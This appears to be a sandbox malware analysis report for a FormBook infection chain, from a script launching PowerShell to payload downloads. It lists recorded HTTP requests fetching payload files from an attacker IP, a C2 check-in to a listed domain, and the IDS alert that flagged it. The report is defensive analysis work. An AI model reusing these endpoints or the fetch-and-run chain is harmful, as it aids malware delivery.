        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then mov esp, ebp10_2_01142198
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then pop edi10_2_011423C8
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then pop edi10_2_011435F8
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then mov esp, ebp10_2_01142191
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then pop edi10_2_011548A4
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then pop edi10_2_01143228
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then mov esp, ebp10_2_01142271
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then xor eax, eax10_2_01149418
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then pop ebx10_2_01151647
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 4x nop then pop ebx10_2_01151648
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then pop ebx11_2_02CE3070
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then xor eax, eax11_2_02CDAE40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then pop ebx11_2_02CE306F

        Networking

        barindex
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49717 -> 47.91.88.207:80
        Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
        Source: Joe Sandbox ViewIP Address: 47.91.88.207 47.91.88.207
        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_011435F8 getaddrinfo,setsockopt,recv,recv,10_2_011435F8
        Source: global trafficHTTP traffic detected: GET /Stereotyperingens72.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /EYioOXUtWs45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /gnbc/?TjZX=EdG8rNSX_ZztGDlp&fLe=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: global trafficDNS traffic detected: DNS query: www.tyaer.com
        Source: global trafficDNS traffic detected: DNS query: www.oyoing.com
        Source: global trafficDNS traffic detected: DNS query: www.megabet303.lol
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Apr 2024 09:04:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B10BE8A762AE81CED627A4E1A7A9358CAAB5846793A1442B0047BEFEB01Set-Cookie: _csrf=9b895372084a89fe8c8a5bba3c43db46315c9bdef088af03cbbed36579c8d55ea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%220HbANrynv9OLPgrRc6bwtTZQ9wGPFTw0%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 78 5a 57 78 44 37 4e 6b 77 79 69 38 74 71 59 67 4b 79 4c 42 77 49 42 77 6d 78 73 4c 7a 53 6f 31 41 38 5f 56 62 72 50 5f 47 77 48 31 33 64 4e 4f 5f 52 61 36 52 73 71 50 36 57 78 37 52 62 4f 53 34 30 62 35 62 48 2d 5a 63 47 51 36 75 4a 49 2d 39 61 74 73 4d 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="
        Source: powershell.exe, 00000002.00000002.2624324723.000001CB00223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2624324723.000001CB01E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
        Source: wab.exe, 00000008.00000003.2709804128.0000000006A3B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2806420134.0000000006A3B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2709595724.0000000006A39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/
        Source: wab.exe, 00000008.00000002.2806244411.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/EYioOXUtWs45.bin
        Source: wab.exe, 00000008.00000002.2806244411.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/EYioOXUtWs45.binM
        Source: powershell.exe, 00000002.00000002.2624324723.000001CB00223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Stereotyperingens72.xsnP
        Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Stereotyperingens72.xsnXRyl4
        Source: powershell.exe, 00000002.00000002.2624324723.000001CB02036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.Hb
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016747138.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016747138.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
        Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
        Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016747138.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
        Source: wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
        Source: wscript.exe, 00000000.00000003.2014886520.000001B66CD8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
        Source: wscript.exe, 00000000.00000003.2024611329.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
        Source: wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049962776.000001B66AEBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AEBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, 00000000.00000003.2024611329.000001B66CDBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7c3ca03910489
        Source: wscript.exe, 00000000.00000003.2025795412.000001B66CD62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025577082.000001B66CD31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025686902.000001B66CD5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025331654.000001B66CD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7c3ca03910
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
        Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
        Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
        Source: powershell.exe, 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
        Source: wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
        Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
        Source: wscript.exe, 00000000.00000003.2025795412.000001B66CD62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025577082.000001B66CD31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051411506.000001B66CD5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048272066.000001B66CD5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025686902.000001B66CD5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025331654.000001B66CD0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
